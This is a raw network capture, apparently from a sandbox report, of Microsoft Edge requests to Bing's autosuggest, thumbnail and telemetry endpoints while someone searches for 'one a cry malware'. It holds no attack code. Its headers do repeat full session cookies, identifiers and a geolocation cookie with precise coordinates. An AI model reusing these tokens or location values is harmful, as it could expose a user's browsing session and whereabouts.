cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 6516
date: Thu, 17 Oct 2024 21:04:09 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199049.1491a261
GET

https://www.bing.com/AS/Suggestions?pt=page.serp&bq=one+a+cry+malware&mkt=en-gb&qry=one%20a%20c&cp=7&csr=1&msbqf=false&pths=1&cvid=B7E570A9AE8C45A28F4A27F1C0C7A0D7

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /AS/Suggestions?pt=page.serp&bq=one+a+cry+malware&mkt=en-gb&qry=one%20a%20c&cp=7&csr=1&msbqf=false&pths=1&cvid=B7E570A9AE8C45A28F4A27F1C0C7A0D7 HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
x-autosuggest-contentwidth: 650
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:04:09 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199049.1491a2ad
GET

https://www.bing.com/AS/Suggestions?pt=page.serp&bq=one+a+cry+malware&mkt=en-gb&qry=one%20a%20&cp=6&csr=1&msbqf=false&pths=1&cvid=B7E570A9AE8C45A28F4A27F1C0C7A0D7

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /AS/Suggestions?pt=page.serp&bq=one+a+cry+malware&mkt=en-gb&qry=one%20a%20&cp=6&csr=1&msbqf=false&pths=1&cvid=B7E570A9AE8C45A28F4A27F1C0C7A0D7 HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
x-autosuggest-contentwidth: 650
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb

Response

HTTP/2.0 200

content-length: 1052
content-type: application/json; charset=utf-8
cache-control: private, max-age=300
content-encoding: gzip
vary: Accept-Encoding
x-eventid: 67117bc9651c45349fcbe8b9e813fa20
x-as-setsessionmarket: en-gb
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-l39FYj70OIzOCyb67Jy6rgS6stXaGBkfug4tR1DdbiA='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Thu, 17 Oct 2024 21:04:09 GMT
set-cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb; domain=.bing.com; path=/; HttpOnly
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199049.1491a30d
GET

https://www.bing.com/th?id=OSK.hrQOT07wE-8FUiHzV2mrRSWEPaY7CLvSFOBoZmNaiNw&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /th?id=OSK.hrQOT07wE-8FUiHzV2mrRSWEPaY7CLvSFOBoZmNaiNw&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 10931
date: Thu, 17 Oct 2024 21:04:09 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199049.1491a405
GET

https://www.bing.com/fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&TYPE=Event.ClientInst&DATA=%5B%7B%22Meta%22%3A%22q%3Aone%20a%20cry%2Ci%3A7%2Cig%3ACE2EF8307A4A4A43A1FB4DE4573687E2%22%2C%22AnswerInfo%22%3A%22HS%3B17%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1729199048895%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20a%20cr%2Ci%3A9%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1729199048908%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20a%20c%2Ci%3A10%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1729199048937%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20a%20c%2Ci%3A10%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1729199048958%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20a%20%2Ci%3A11%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1729199048969%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20a%20%2Ci%3A11%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1729199048989%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20a%20cry%2Ci%3A8%22%2C%22AsResponseLength%22%3A%22811%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1729199048997%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20a%20%2Ci%3A8%2Cig%3A764CC6FF3F6042D08B89DB77946AE964%22%2C%22AnswerInfo%22%3A%22HS%3B17%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1729199048997%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20a%20cr%2Ci%3A9%22%2C%22AsResponseLength%22%3A%221032%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1729199049047%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20a%20%2Ci%3A9%2Cig%3A96C6EB1F83A34499A03408DC1588B4F0%22%2C%22AnswerInfo%22%3A%22HS%3B17%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1729199049048%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%5D

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&TYPE=Event.ClientInst&DATA=%5B%7B%22Meta%22%3A%22q%3Aone%20a%20cry%2Ci%3A7%2Cig%3ACE2EF8307A4A4A43A1FB4DE4573687E2%22%2C%22AnswerInfo%22%3A%22HS%3B17%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1729199048895%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20a%20cr%2Ci%3A9%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1729199048908%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20a%20c%2Ci%3A10%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1729199048937%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20a%20c%2Ci%3A10%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1729199048958%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20a%20%2Ci%3A11%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1729199048969%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20a%20%2Ci%3A11%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1729199048989%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20a%20cry%2Ci%3A8%22%2C%22AsResponseLength%22%3A%22811%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1729199048997%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20a%20%2Ci%3A8%2Cig%3A764CC6FF3F6042D08B89DB77946AE964%22%2C%22AnswerInfo%22%3A%22HS%3B17%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1729199048997%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20a%20cr%2Ci%3A9%22%2C%22AsResponseLength%22%3A%221032%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1729199049047%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20a%20%2Ci%3A9%2Cig%3A96C6EB1F83A34499A03408DC1588B4F0%22%2C%22AnswerInfo%22%3A%22HS%3B17%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1729199049048%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:04:09 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199049.1491a403
GET

https://www.bing.com/AS/Suggestions?pt=page.serp&bq=one+a+cry+malware&mkt=en-gb&qry=one%20&cp=4&csr=1&msbqf=false&pths=1&cvid=B7E570A9AE8C45A28F4A27F1C0C7A0D7

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /AS/Suggestions?pt=page.serp&bq=one+a+cry+malware&mkt=en-gb&qry=one%20&cp=4&csr=1&msbqf=false&pths=1&cvid=B7E570A9AE8C45A28F4A27F1C0C7A0D7 HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
x-autosuggest-contentwidth: 650
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
